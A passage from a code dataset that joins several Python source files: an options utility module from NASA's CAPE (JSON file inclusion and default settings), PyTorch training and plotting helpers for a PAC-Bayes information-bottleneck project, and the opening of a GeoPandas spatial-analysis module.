whichever is appropriate\n :Versions:\n * 2014-08-01 ``@ddalle``: Version 1.0\n \"\"\"\n # Use the :func:`getel` function to do this.\n return getel(rc.get(p), 0)\n\n\n# Regular expression for JSON file inclusion\nregex = re.compile(\n r'(?P<before>.*)' +\n r'(?P<cmd>JSONFile\\(\"(?P<json>[-\\w.+= /\\\\]+)\"\\))' +\n r'(?P<after>.*)')\n\n\n# Function to expand JSON file inputs\ndef expandJSONFile(fname):\n r\"\"\"Expand contents of other JSON files\n \n :Call:\n >>> txt, fnames, linenos = expandJSONFile(fname)\n :Inputs:\n *fname*: :class:`str` | :class:`unicode`\n Name of JSON file to read\n :Outputs:\n *txt*: :class:`unicode`\n Full text with references to JSON file(s) expanded\n *fnames*: :class:`list`\\ [:class:`str`]\n List of files read (can include the same file multiple\n times) including *fname* and any other expanded\n ``JSONFile()`` directives\n *linenos*: :class:`np.ndarray` (:class:`int`, ndim=2)\n Line numbers in original files; column *j* represents the\n line number of each line in file *j*; ``0`` for lines not\n from file *j*\n :Versions:\n * 2015-12-10 ``@ddalle``: Version 1.0\n \"\"\"\n # Read the input file.\n txt = io.open(fname, mode=\"r\", encoding=\"utf-8\").read()\n # Split lines\n lines = txt.rstrip().split('\\n')\n # Number of lines\n n = len(lines)\n # Initialize line numbers\n linenos = np.zeros((n,1), dtype=\"int\")\n linenos[:,0] = 1 + np.arange(n)\n # Initialize list of file names\n fnames = [fname]\n # Number of JSON files read (can read same file more than once)\n nf = 1\n # Start with the first line.\n i = 0\n # Loop through lines.\n while i < len(lines):\n # Get the line\n line = lines[i]\n # Check if line starts with a comment\n if line.lstrip().startswith(\"//\"):\n # Javascript-style comment\n lines[i] = \"\"\n continue\n elif line.lstrip().startswith(\"#\"):\n # Python-style comment\n lines[i] = \"\"\n continue\n # Check for an inclusion\n match = regex.search(line)\n # If no match, move along\n if match is None:\n # Go to next line\n i += 1\n continue\n # Extract the file name.\n fjson = match.group(\"json\")\n # Expand that JSON file\n t_j, F_j, ln_j = expandJSONFile(fjson)\n # Split text to lines\n lines_j = 
t_j.rstrip().split(\"\\n\")\n # Number of lines\n n_j = len(lines_j)\n # Number of included files\n nf_j = len(F_j)\n # Pad line counts with zeros for lines of new file\n if n_j > 1:\n # Split current line and insert n_j-1 zeros\n linenos = np.vstack((\n linenos[:i+1,:], np.zeros((n_j-2,nf), dtype=\"int\"),\n linenos[i:,:]))\n # Create line counts for new file\n linenos_json = np.vstack((\n np.zeros((i,nf_j), dtype=\"int\"), ln_j,\n np.zeros((n-i-1,nf_j), dtype=\"int\")))\n # Accumulate line numbers and file list\n fnames += F_j\n linenos = np.hstack((linenos, linenos_json))\n # Modify line count and file count\n n += (n_j-1)\n nf += nf_j\n # Update first and last line of expansion\n if n_j == 1:\n # One-line inclusion\n lines[i] = line.replace(match.group(\"cmd\"), lines_j[0])\n else:\n # Update first line\n lines[i] = match.group(\"before\") + lines_j[0]\n # Update last line of inclusion\n lines_j[-1] = lines_j[-1].rstrip() + match.group(\"after\")\n # Update line set\n lines = lines[:i+1] + lines_j[1:] + lines[i+1:]\n # Check for multiple inclusions\n if regex.search(lines[i]):\n # Remain on this line\n pass\n else:\n # Move past expanded file\n i += n_j\n # Return the lines as one string.\n txt = \"\\n\".join(lines) + \"\\n\"\n # Output\n return txt, fnames, linenos\n\n\n# Function to read JSON file with all the works\ndef loadJSONFile(fname):\n r\"\"\"Read JSON file w/ helpful error handling and comment stripping\n \n :Call:\n >>> d = loadJSONFile(fname)\n :Inputs:\n *fname*: :class:`str`\n Name of JSON file to read\n :Outputs:\n *d*: :class:`dict`\n JSON contents in Python form\n :Versions:\n * 2015-12-15 ``@ddalle``: Version 1.0\n \"\"\"\n # Read the input file\n txt, fnames, linenos = expandJSONFile(fname)\n # Process into dictionary\n try:\n # Process into dictionary\n d = json.loads(txt)\n except Exception as e:\n # Get the line number\n try:\n # Read from the error message\n etxt = re.findall('line [0-9]+', e.args[0])[0]\n # Line number\n n = int(etxt.split()[1])\n # Get lines so we can print surrounding text by line number\n lines = txt.split(\"\\n\")\n # Start and end line number\n n0 = max(n-3, 0)\n n1 = min(n+2, len(lines))\n # Initialize message with \n msg = \"Error while reading JSON file '%s':\\n\" % fname\n # Add the exception's message\n msg += \"\\n\".join(list(e.args)) + \"\\n\"\n # Loop through individual files\n for i, fn in enumerate(fnames):\n # Get line number \n lni = linenos[n-1,i]\n # Skip if ``0``\n if lni == 0: continue\n # Add to report\n msg += \" (line %i of file '%s')\\n\" % (lni, fn)\n # Additional header\n msg += \"\\nLines surrounding problem area (comments stripped):\\n\"\n # Print some lines around the problem\n for i in range(n0, n1):\n # Add line with line number\n if i+1 == n:\n # Add special marker for reported line\n msg += (\"%4i> %s\\n\" % (i+1, lines[i]))\n else:\n # Neighboring line\n msg += (\"%4i: %s\\n\" % (i+1, lines[i]))\n # Show the message\n raise ValueError(msg)\n except ValueError as e:\n # Raise the error we just made.\n raise e\n except Exception:\n # Unknown error\n raise e\n # Output\n return d\n\n\n# Function to get the default settings.\ndef getDefaults(fname):\n r\"\"\"Read default settings configuration file\n \n :Call:\n >>> defs = getDefaults(fname)\n :Inputs:\n *fname*: :class:`str`\n Name of file with settings to read\n :Outputs:\n *defs*: :class:`dict`\n Dictionary of settings read from JSON file\n :Versions:\n * 2014-06-03 ``@ddalle``: Version 1.0\n * 2014-07-28 ``@ddalle``: Version 1.1; in options module\n \"\"\"\n 
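# Example (editor's illustration; mirrors getCapeDefaults() below):\n # defs = getDefaults(os.path.join(CAPE_OPTS_FOLDER, 'cape.default.json'))\n 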
# Process the default input file.\n return loadJSONFile(fname)\n\n\n# Function to get the default CAPE settings\ndef getCapeDefaults():\n r\"\"\"Read default CAPE settings configuration file\n \n :Call:\n >>> defs = getCapeDefaults()\n :Outputs:\n *defs*: :class:`dict`\n Dictionary of settings read from JSON file\n :Versions:\n * 2015-09-20 ``@ddalle``: Version 1.0\n * 2021-03-01 ``@ddalle``: Version 2.0; local JSON file\n \"\"\"\n # File name\n fname = os.path.join(CAPE_OPTS_FOLDER, 'cape.default.json')\n # Read the settings.\n return getDefaults(fname)\n\n\n# Function to get template\ndef getTemplateFile(fname):\n r\"\"\"Get the absolute path to a template file by name\n \n :Call:\n >>> fabs = getTemplateFile(fname)\n :Inputs:\n *fname*: :class:`str`\n Name of file, such as :file:`input.cntl`\n :Outputs:\n *fabs*: :class:`str`\n Full path to file\n :Versions:\n * 2015-10-26 ``@ddalle``: Version 1.0\n \"\"\"\n # Join with BaseFolder and 'templates'\n return os.path.join(BaseFolder, 'templates', fname)\n\n\n# Get the keys of the default dict.\ndef applyDefaults(opts, defs):\n r\"\"\"Recursively apply defaults for any missing options\n \n :Call:\n >>> opts = applyDefaults(opts, defs)\n :Inputs:\n *opts*: :class:`dict` | :class:`odict`\n Options dictionary with some options possibly missing\n *defs*: :class:`dict`\n Full dictionary of default settings\n :Outputs:\n *opts*: :class:`dict` | :class:`odict`\n Input dictionary with all of the fields of *defs*\n :Versions:\n * 2014-06-17 ``@ddalle``: Version 1.0\n * 2014-07-28 ``@ddalle``: Version 1.1; move to options module\n \"\"\"\n # Loop through the keys in the options dict.\n for k in defs:\n # Check if the key is non-default.\n if k not in opts:\n # Assign the key.\n opts[k] = defs[k]\n elif (type(opts[k]) is dict) and (not k.startswith(\"Ref\")):\n # Recurse for dictionaries.\n opts[k] = applyDefaults(opts[k], defs[k])\n # Output the modified defaults.\n return opts\n\n\n# Test if a variable is \"list-like\"\ndef isArray(x):\n r\"\"\"Test if a variable is \"list-like.\"\n \n :Call:\n >>> q = isArray(x)\n :Inputs:\n *x*: any\n Any variable\n :Outputs:\n *q*: :class:`bool`\n ``True`` if and only if *x* is a list, tuple, or NumPy array\n :Versions:\n * 2014-12-17 ``@ddalle``: Version 1.0\n \"\"\"\n return (type(x).__name__ in ARRAY_TYPE_NAMES)\n\n\n# Test if a variable is \"string-like\"\ndef isStr(x):\n r\"\"\"Test if a variable is \"string-like\"\n \n :Call:\n >>> q = isStr(x)\n :Inputs:\n *x*: any\n Any variable\n :Outputs:\n *q*: :class:`bool`\n ``True`` if and only if *x* is a string or unicode\n :Versions:\n * 2014-12-17 ``@ddalle``: Version 1.0\n \"\"\"\n # Get the type.\n typ = type(x).__name__\n # Test it.\n return typ.startswith('str') or (typ in ['unicode'])\n\n\n# Dictionary derivative specific to options\nclass odict(dict):\n r\"\"\"Dictionary-based options module\n \n :Call:\n >>> opts = odict(**kw)\n :Inputs:\n *kw*: :class:`dict`\n Dictionary of options\n :Outputs:\n *opts*: :class:`cape.options.util.odict`\n Dictionary-based options interface\n :Versions:\n * 2014-08-02 ``@ddalle``: Version 1.0\n * 2015-11-10 ``@ddalle``: More robust :func:`get_key` using *rck*\n \"\"\"\n # General \"get\" function\n def get_key(self, k, i=None, rck=None):\n r\"\"\"Intelligently get option for index *i* of key *k*\n\n This is a two-step process. The first is to get the dictionary\n value or the default if *k* is not in *opts*. The default is\n ``rc[k]``. Let *V* be the result of the process.\n\n The second step is to apply indexing. 
If *V* is a scalar or *i*\n is ``None``, then *V* is the output. Otherwise, the function\n will attempt to return ``V[i]``, but if *i* is too large,\n ``V[-1]`` is the output.\n\n :Call:\n >>> v = opts.get_key(k, i, rck=None)\n :Inputs:\n *k*: :class:`str`\n Name of key to get\n *i*: :class:`int` | ``None``\n Index to apply\n *rck*: :class:`str` | ``None``\n Name of *rc0* key to default to\n :Outputs:\n *v*: **any**\n Let ``V=opts.get(k,rc[k])``. Then *v* is either\n ``V[i]`` if possible, ``V[-1]`` if *V* is a list and *i*\n is not ``None``, or ``V`` otherwise\n :See also:\n * :func:`cape.options.util.getel`\n :Versions:\n * 2014-08-02 ``@ddalle``: Version 1.0\n * 2015-11-10 ``@ddalle``: Version 1.1; add *rck*\n \"\"\"\n # Default key name\n if rck is None: rck = k\n # Get the value after applying defaults.\n v = self.get(k, rc.get(rck))\n # Apply intelligent indexing.\n return getel(v, i)\n \n # General \"set\" function\n def set_key(self, k, v=None, i=None, rck=None):\n r\"\"\"Set option for key *k*\n\n This sets the value for ``opts[k]`` or ``opts[k][i]`` if\n appropriate. If *i* is greater than the length of ``opts[k]``,\n then ``opts[k]`` is appended with its current last value enough\n times to make ``opts[k][i]`` exist.\n\n :Call:\n >>> opts.set_key(k, v=None, i=None, rck=None)\n :Inputs:\n *k*: :class:`str`\n Name of key to set\n *i*: :class:`int` | ``None``\n Index to apply\n *v*: any\n Value to set\n *rck*: :class:`str` | ``None``\n Name of key in *rc0* default option dictionary; defaults to *k*\n :See also:\n * :func:`cape.options.util.setel`\n :Versions:\n * 2014-08-02 ``@ddalle``: Version 1.0\n * 2015-11-10 ``@ddalle``: Version 1.1; add *rck*\n \"\"\"\n # Check for default key name\n if rck is None: rck = k\n # Check for default value.\n if v is None:\n # Get the default, but ensure a scalar.\n v = rc0(rck)\n # Get the current full setting.\n V = self.get(k, rc.get(rck))\n # Assign the input value .\n self[k] = setel(V, i, v)\n \n # Copy\n def copy(self):\n r\"\"\"Create a copy of an options interface\n \n :Call:\n >>> opts1 = opts.copy()\n :Inputs:\n *opts*: :class:`odict`\n Options instance\n :Outputs:\n *opts1*: :class:`odict`\n Deep copy of options instance\n :Versions:\n * 2019-05-10 ``@ddalle``: Version 1.0\n \"\"\"\n # Initialize copy\n opts = self.__class__()\n # Loop through keys\n for k, v in self.items():\n # Check the type\n if not isinstance(v, dict):\n # Save a copy of the key\n opts[k] = copy.copy(v)\n else:\n # Recurse\n opts[k] = v.copy()\n # Output\n return opts\n\n # Generic subsection\n def init_section(self, cls, sec=None, parent=None, prefix=None):\n r\"\"\"Initialize a generic section\n\n :Call:\n >>> opts.init_section(cls, sec=None, **kw)\n :Inputs:\n *opts*: :class:`odict`\n Options interface\n *cls*: :class:`type`\n Class to use for *opts[sec]*\n *sec*: {*cls.__name__*} | :class:`str`\n Specific key name to use for subsection\n *parent*: {``None``} | :class:`str`\n Other subsection from which to inherit defaults\n *prefix*: {``None``} | :class:`str`\n Prefix to add at beginning of each key\n :Versions:\n * 2021-10-18 ``@ddalle``: Version 1.0\n \"\"\"\n # Default name\n if sec is None:\n # Use the name of the class\n sec = cls.__name__\n # Check if present\n if sec not in self:\n # Create empty instance\n self[sec] = cls()\n # Otherwise get value\n v = self[sec]\n # Check its type\n if isinstance(v, cls):\n # Already good\n pass\n elif isinstance(v, dict):\n # Convert :class:`dict` to special class\n if prefix is None:\n # Transfer keys into new 
class\n self[sec] = cls(**v)\n else:\n # Create dict with prefixed key names\n tmp = {\n prefix + k: vk\n for k, vk in v.items()\n }\n # Convert *tmp* instead of *v*\n self[sec] = cls(**tmp)\n else:\n # Got something other than a mapping\n print(\" Warning: could not convert options section '%s',\" % sec)\n print(\" which has type '%s'\" % type(v).__name__)\n return\n # Check for *parent* to define default settings\n if parent:\n # Get the settings of parent\n vp = self.get(parent)\n # Ensure it's a dict\n if not isinstance(vp, dict):\n return\n # Loop through *vp*, but don't overwrite\n for k, vpk in vp.items():\n v.setdefault(k, vpk)\n\n\n# Decorator to get function from subclass\ndef subsec_func(cls, sec=None, parent=None, init=True):\n r\"\"\"Decorator (w/ args) to apply a function from a subsection class\n \n :Call:\n >>> f = subsec_func(cls, sec=None, parent=None, init=True)\n :Inputs:\n *cls*: :class:`type`\n Class to apply to subsection\n *sec*: {*cls.__name__*} | :class:`str`\n Name of subsection\n *init*: {``True``} | ``False``\n If ``True`` and nontrivial *cls*, initialize subsection\n *parent*: {``None``} | :class:`str`\n Name of section from which to get default settings\n :Outputs:\n *f*: :class:`function`\n Decorator with arguments expanded\n :Examples:\n .. code-block:: python\n \n @subsec_func(RunControl, \"RunControl\")\n def get_PhaseSequence(self, *a, **kw):\n pass\n \n :Versions:\n * 2019-01-10 ``@ddalle``: Version 1.0\n * 2021-10-18 ``@ddalle``: Version 1.1; default *sec*\n \"\"\"\n # Default *sec*\n if sec is None:\n sec = cls.__name__\n # Decorator for the function\n def decorator_subsec(func):\n # Inherit metadata from func\n @functools.wraps(func)\n # The before and after function\n def wrapper(self, *a, **kw):\n # Initialize the section\n if init and (cls is not None):\n self.init_section(cls, sec, parent=parent)\n # Get the function from the subsection\n f = getattr(self[sec], func.__name__)\n # Call the function from the subsection\n v = f(*a, **kw)\n # Return value\n return v\n # Copy the docstring\n if cls is not None:\n wrapper.__doc__ = getattr(cls,func.__name__).__doc__\n # Output\n return wrapper\n # Return decorator\n return decorator_subsec\n\n\n# Apply all methods of one subsection class to parent\ndef promote_subsec(cls1, cls2, sec=None, skip=[], **kw):\n r\"\"\"Promote all methods of a subsection class to parent options class\n\n Methods of parent class will not be overwritten\n\n :Call:\n >>> promote_subsec(cls1, cls2, sec=None, skip=[], **kw)\n :Inputs:\n *cls1*: :class:`type`\n Parent class\n *cls2*: :class:`type`\n Subsection class\n *skip*: {``[]``} | :class:`list`\n List of methods from *cls2* not to add to *cls1*\n *init*: {``True``} | ``False``\n If ``True``, initialize subsection when *cls1* methods used\n *parent*: {``None``} | :class:`str`\n Name of section from which to get default settings\n :Versions:\n * 2019-01-10 ``@ddalle``: Version 1.0\n \"\"\"\n # Get property dictionaries\n dict1 = cls1.__dict__\n dict2 = cls2.__dict__\n # Create the decorator to promote each method (function)\n f_deco = subsec_func(cls2, sec, **kw)\n # Loop through methods of *cls2*\n for fn in dict2:\n # Manual skipping\n if fn in skip:\n continue\n # Get value of *cls2* attribute\n func = dict2[fn]\n # Skip if not a function\n if not callable(func):\n continue\n # Check if already present\n if fn in dict1:\n continue\n # Set attribute to decorated function\n setattr(cls1, fn, 
f_deco(func))\n\n","repo_name":"nasa/cape","sub_path":"cape/cfdx/options/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":27434,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"39888967255","text":"# -*- coding: utf-8 -*-\nimport torch\nimport numpy as np\nimport pandas as pd\nimport os\nimport pdb\nimport torchvision.transforms\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch import nn\n\nfrom collections import defaultdict\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\n\n__LAYER_LIST__ = ['layer 1', 'layer 2', 'layer 3', 'layer 4', 'layer 5']\n\ndef img_preprocess(x, y=None, use_gpu=True):\n x = torch.tensor(x) / 255.0\n if use_gpu:\n x = x.cuda()\n if y is not None:\n y = torch.LongTensor(y)\n if use_gpu:\n y = y.cuda()\n return x, y\n\n else:\n return x\n\ndef img_preprocess_cifar(x, y=None, use_gpu=True):\n mean_list = [125.3, 123.0, 113.9]\n std_list = [63.0, 62.1, 66.7]\n\n new_x_list = []\n for i, m in enumerate(mean_list):\n x_ = (x[:,i] - m) / (std_list[i])\n new_x_list.append(x_)\n \n x = np.array(new_x_list).transpose(1,0,2,3)\n \n # flatten\n x = x.reshape(len(x), 3*32*32)\n x = torch.Tensor(x)\n\n if use_gpu:\n x = x.cuda()\n\n if y is not None:\n y = torch.LongTensor(y)\n if use_gpu:\n y = y.cuda()\n\n return x, y\n\n else:\n return x\n\ndef train(model,\n sub_idx,\n x_tr, y_tr, \n x_va, y_va, \n num_epoch,\n batch_size,\n lr, \n weight_decay,\n early_stop_ckpt_path,\n early_stop_tolerance=3,\n verbose=True,\n ):\n \"\"\"Given selected subset, train the model until converge.\n \"\"\"\n # early stop\n best_va_acc = 0\n num_all_train = 0\n early_stop_counter = 0\n\n if not os.path.exists('./checkpoints'):\n os.makedirs('./checkpoints')\n\n # init training\n optimizer = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=lr, weight_decay=weight_decay)\n num_all_tr_batch = int(np.ceil(len(sub_idx) / batch_size))\n\n # num class\n num_class = torch.unique(y_va).shape[0]\n \n for epoch in tqdm(range(num_epoch)):\n total_loss = 0\n model.train()\n np.random.shuffle(sub_idx)\n\n for idx in range(num_all_tr_batch):\n batch_idx = sub_idx[idx*batch_size:(idx+1)*batch_size]\n x_batch = x_tr[batch_idx]\n y_batch = y_tr[batch_idx]\n\n pred = model(x_batch)\n if num_class > 2:\n loss = F.cross_entropy(pred, y_batch,\n reduction=\"none\")\n else:\n loss = F.binary_cross_entropy(pred[:,0], y_batch.float(), \n reduction=\"none\")\n\n sum_loss = torch.sum(loss)\n avg_loss = torch.mean(loss)\n\n num_all_train += len(x_batch)\n optimizer.zero_grad()\n avg_loss.backward()\n optimizer.step()\n\n total_loss = total_loss + sum_loss.detach()\n\n if x_va is not None:\n # evaluate on va set\n model.eval()\n pred_va = predict(model, x_va)\n acc_va = eval_metric(pred_va, y_va, num_class)\n if verbose:\n print(\"epoch: {}, acc: {}\".format(epoch, acc_va.item()))\n \n if epoch == 0:\n best_va_acc = acc_va\n\n if acc_va > best_va_acc:\n best_va_acc = acc_va\n early_stop_counter = 0\n # save model\n save_model(early_stop_ckpt_path, model)\n\n else:\n early_stop_counter += 1\n\n if early_stop_counter >= early_stop_tolerance:\n if verbose:\n print(\"early stop on epoch {}, val acc {}\".format(epoch, best_va_acc))\n # load model from the best checkpoint\n load_model(early_stop_ckpt_path, model)\n break\n\n return best_va_acc\n\ndef train_prior(model,\n x_tr, y_tr,\n num_epoch=10,\n batch_size=128,\n lr=1e-3,\n weight_decay=1e-5,\n 
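# default checkpoint path; train() creates ./checkpoints/ if it does not exist\n 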
early_stop_ckpt_path=\"./checkpoints/mlp_prior.pth\",\n verbose=False,\n ):\n all_tr_idx = np.arange(len(x_tr))\n train(model, all_tr_idx, x_tr, y_tr, x_tr, y_tr, \n num_epoch=num_epoch,\n batch_size=batch_size,\n lr=lr,\n weight_decay=weight_decay,\n early_stop_ckpt_path=early_stop_ckpt_path,\n verbose=verbose,\n )\n w0_dict = dict()\n for param in model.named_parameters():\n w0_dict[param[0]] = param[1].clone().detach() # detach but still on gpu\n model.w0_dict = w0_dict\n model._initialize_weights()\n print(\"done get prior weights\")\n\ndef train_track_info(model,\n sub_idx,\n x_tr, y_tr, \n x_va, y_va, \n num_epoch,\n batch_size,\n lr,\n weight_decay,\n track_info_per_iter=-1,\n verbose=True,\n ):\n \"\"\"Given selected subset, train the model until converge.\n Args:\n model: the trained model class\n sub_idx: picked sample indices in training data\n x_tr, y_tr, x_va, y_va: tr/va data set and labels\n track_info_per_iter: evaluate information per %S iterations (SGD updates),\n if set to -1, track info at the end of every epoch\n \"\"\"\n\n info_dict = defaultdict(list)\n loss_acc_dict = defaultdict(list)\n\n # init training with the SGLD optimizer\n optimizer = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=lr, weight_decay=weight_decay)\n\n # num class\n num_class = torch.unique(y_va).shape[0]\n num_all_tr_batch = int(np.ceil(len(sub_idx) / batch_size))\n num_all_train = 0\n iteration = 0\n for epoch in range(num_epoch):\n total_loss = 0\n model.train()\n np.random.shuffle(sub_idx)\n\n for idx in range(num_all_tr_batch):\n iteration += 1\n batch_idx = sub_idx[idx*batch_size:(idx+1)*batch_size]\n x_batch = x_tr[batch_idx]\n y_batch = y_tr[batch_idx]\n\n pred = model(x_batch)\n\n if num_class > 2:\n loss = F.cross_entropy(pred, y_batch,\n reduction=\"none\")\n else:\n loss = F.binary_cross_entropy(pred[:,0], y_batch.float(), \n reduction=\"none\")\n\n avg_loss = torch.mean(loss)\n\n optimizer.zero_grad()\n\n avg_loss.backward()\n\n optimizer.step()\n\n num_all_train += len(x_batch)\n\n total_loss = total_loss + avg_loss.item()\n\n if iteration % track_info_per_iter == 0 and track_info_per_iter > 0:\n # estimate information stored in weights\n info = model.compute_information_bp_fast(x_tr, y_tr, no_bp=True)\n for k in info.keys():\n info_dict[k].append(info[k])\n if verbose:\n print(\"iteration/epoch: {}/{}, info: {}\".format(iteration, epoch, info))\n if verbose:\n print(\"epoch: {}, tr loss: {}, lr: {:.6f}\".format(epoch, total_loss/num_all_tr_batch, lr))\n\n # start to evaluate\n if epoch % 1 == 0:\n model.eval()\n pred_tr = predict(model, x_tr)\n acc_tr = eval_metric(pred_tr, y_tr, num_class)\n\n loss_acc_dict[\"tr_loss\"].append((total_loss/num_all_tr_batch))\n loss_acc_dict[\"tr_acc\"].append(acc_tr.item())\n\n if x_va is not None:\n # evaluate on va set\n model.eval()\n pred_va = predict(model, x_va)\n acc_va = eval_metric(pred_va, y_va, num_class)\n if verbose:\n print(\"epoch: {}, va acc: {}\".format(epoch, acc_va.item()))\n loss_acc_dict[\"va_acc\"].append(acc_va.item())\n \n # track info every epoch \n if track_info_per_iter == -1:\n info = model.compute_information_bp_fast(x_tr, y_tr, no_bp=True)\n for k in info.keys():\n info_dict[k].append(info[k])\n if verbose:\n print(\"epoch: {}, info: {}\".format(epoch, info))\n \n l2_norm = 0\n for pa in model.named_parameters():\n l2_norm += pa[1].data.norm(2)\n loss_acc_dict[\"l2_norm\"].append(l2_norm.cpu().item())\n\n\n\n return info_dict, loss_acc_dict\n\n\ndef save_model(ckpt_path, model):\n 
torch.save(model.state_dict(), ckpt_path)\n return\n\ndef load_model(ckpt_path, model):\n try:\n model.load_state_dict(torch.load(ckpt_path))\n except:\n model.load_state_dict(torch.load(ckpt_path, map_location=\"cpu\"))\n\n return\n\ndef predict(model, x, batch_size=100):\n model.eval()\n num_all_batch = np.ceil(len(x)/batch_size).astype(int)\n pred = []\n for i in range(num_all_batch):\n with torch.no_grad():\n pred_ = model(x[i*batch_size:(i+1)*batch_size])\n pred.append(pred_)\n\n pred_all = torch.cat(pred) # ?, num_class\n return pred_all\n\ndef eval_metric(pred, y, num_class):\n if num_class > 2:\n pred_argmax = torch.max(pred, 1)[1]\n acc = torch.sum((pred_argmax == y).float()) / len(y)\n else:\n acc = eval_metric_binary(pred, y)\n return acc\n\ndef eval_metric_binary(pred, y):\n pred_label = np.ones(len(pred))\n y_label = y.detach().cpu().numpy()\n pred_prob = pred.flatten().cpu().detach().numpy()\n pred_label[pred_prob < 0.5] = 0.0\n acc = torch.Tensor(y_label == pred_label).float().mean()\n return acc\n\ndef setup_seed(seed):\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\ndef feature_map_size(dataname):\n ft_map_size = {\n 'cifar10':4,\n 'cifar100':4,\n 'stl10':12,\n 'svhn':4,\n }\n return ft_map_size[dataname]\n\n\n'''specifically used for plot jupyter notebook.\n'''\ndef plot_info_acc(info_dict, loss_acc_list, act, fig_dir='./figure'):\n df_info = pd.DataFrame(info_dict)\n with plt.style.context(['science','nature',]):\n fig, axs = plt.subplots(2, 1, figsize=(6,8))\n for i,col in enumerate(df_info.columns):\n axs[0].plot(df_info[col], label=__LAYER_LIST__[i], lw=2)\n axs[0].set_xlabel('epoch', size=24)\n axs[0].set_ylabel('IIW',size=24)\n axs[0].tick_params(labelsize=20)\n axs[0].set_title('IIW of {} MLP'.format(act), size=20)\n axs[0].legend(fontsize=24)\n\n # plot loss acc\n ax1 = axs[1]\n ax2 = ax1.twinx()\n lns1 = ax1.plot(loss_acc_list['tr_loss'], label='train loss', color='r', lw=2)\n lns2 = ax2.plot(loss_acc_list['va_acc'], label='test acc', lw=2)\n ax1.set_xlabel('epoch', size=24)\n ax1.set_ylabel('loss', size=24)\n ax2.set_ylabel('acc', size=24)\n ax1.tick_params(labelsize=20)\n ax2.tick_params(labelsize=20)\n ax1.set_ylim(0.3,2.5)\n ax2.set_ylim(0.5,0.8)\n ax1.set_yticks([0.5, 1.0, 1.5, 2.0, 2.5])\n ax2.set_yticks([0.5,0.6,0.7,0.8])\n lns = lns1+lns2\n labs = [l.get_label() for l in lns]\n ax1.legend(lns, labs, fontsize=24)\n plt.tight_layout()\n\n\n plt.savefig(os.path.join(fig_dir,\"{}_acc_loss.png\".format(act)),bbox_inches = 'tight')\n plt.show()\n\n\ndef plot_info(info_dict, fig_dir='./figure', use_legend=True):\n '''specifically used for plot jupyter notebook.\n '''\n df_info = pd.DataFrame(info_dict)\n with plt.style.context(['science','nature',]):\n fig, axs = plt.subplots(figsize=(6,4))\n for i,col in enumerate(df_info.columns):\n axs.plot(df_info[col], label=__LAYER_LIST__[i], lw=2)\n axs.set_xlabel('iteration', size=28)\n axs.set_ylabel('IIW',size=28)\n axs.tick_params(labelsize=24)\n axs.yaxis.get_major_formatter().set_powerlimits((0,1))\n axs.set_title('IIW of {}-layer MLP'.format(int(len(df_info.columns))), size=28)\n if use_legend:\n axs.legend(fontsize=26)\n plt.tight_layout()\n plt.savefig(os.path.join(fig_dir,\"mlp_{}_info.pdf\".format(int(len(df_info.columns)))),bbox_inches = 'tight')\n 
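# Save before show(): some backends clear the active figure on show, which would write a blank file.\n 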
plt.show()\n\n","repo_name":"RyanWangZf/PAC-Bayes-IB","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11914,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"34697081648","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n\n\"\"\"\nTools for analysing spatial data\n===================\nRequires:\n * Pandas\n * GeoPandas\n * Numpy\n * shapely\n \n\n\"\"\"\n\n\n__author__ = \"Juan Escamilla Mólgora\"\n__copyright__ = \"Copyright 2017, JEM\"\n__license__ = \"GPL\"\n__maintainer__ = \"Juan\"\n__email__ = \"molgor@gmail.com\"\n\n\n\nimport geopandas as gpd\nimport pandas as pd\nfrom shapely.geometry import Point\nimport scipy.spatial as sp\nimport scipy.special as special\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport logging\n#from external_plugins.spystats import tools as tl\n\n\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\n\n\n\n\n## These are functions for handling dataframes and creating subsets.\ndef toGeoDataFrame(pandas_dataframe,xcoord_name,ycoord_name,srs = 'epsg:4326'):\n \"\"\"\n Convert a Pandas object to a GeoDataFrame\n Inputs:\n pandas_dataframe : the pandas object to spatialise\n xcoord_name : (String) the column name of the x coordinate.\n ycoord_name : (String) the column name of the y coordinate. \n srs : (String) the source referencing system in EPSG code.\n e.g. epsg:4326.\n \"\"\"\n data = pandas_dataframe\n data['geometry'] = data.apply(lambda z : Point(z[xcoord_name], z[ycoord_name]), axis=1)\n #data['geometry'] = data.apply(lambda z : Point(z.LON, z.LAT), axis=1)\n\n new_data = gpd.GeoDataFrame(data)\n new_data.crs = {'init': srs} # honour the srs argument instead of hard-coding EPSG:4326\n return new_data\n\ndef _subselectDataFrameByCoordinates(dataframe,namecolumnx,namecolumny,minx,maxx,miny,maxy):\n \"\"\"\n Returns a subselection by coordinates using the dataframe.\n \"\"\"\n minx = float(minx)\n maxx = float(maxx)\n miny = float(miny)\n maxy = float(maxy)\n section = dataframe[lambda x: (x[namecolumnx] > minx) & (x[namecolumnx] < maxx) & (x[namecolumny] > miny) & (x[namecolumny] < maxy) ]\n return section\n\ndef _getExtent(geodataframe):\n \"\"\"\n Return the tuple of the spatial extent. Based on geopandas geometry attribute.\n \"\"\"\n minx = min(geodataframe.geometry.x)\n maxx = max(geodataframe.geometry.x)\n\n miny = min(geodataframe.geometry.y)\n maxy = max(geodataframe.geometry.y)\n \n\n return (minx,maxx,miny,maxy)\n \ndef _getExtentFromPoint(x,y,step_sizex,step_sizey):\n \"\"\"\n Returns a tuple (4) specifying the minx,maxx miny, maxy based on a given point and a step size.\n The x,y point is located in the bottom left corner.\n \"\"\" \n minx = x\n miny = y\n maxx = x + step_sizex\n maxy = y + step_sizey\n return (minx,maxx,miny,maxy)\n\ndef _getDistanceMatrix(geopandas_dataset):\n \"\"\"\n Returns the \"self/auto\" distance matrix of a given list of vector data. 
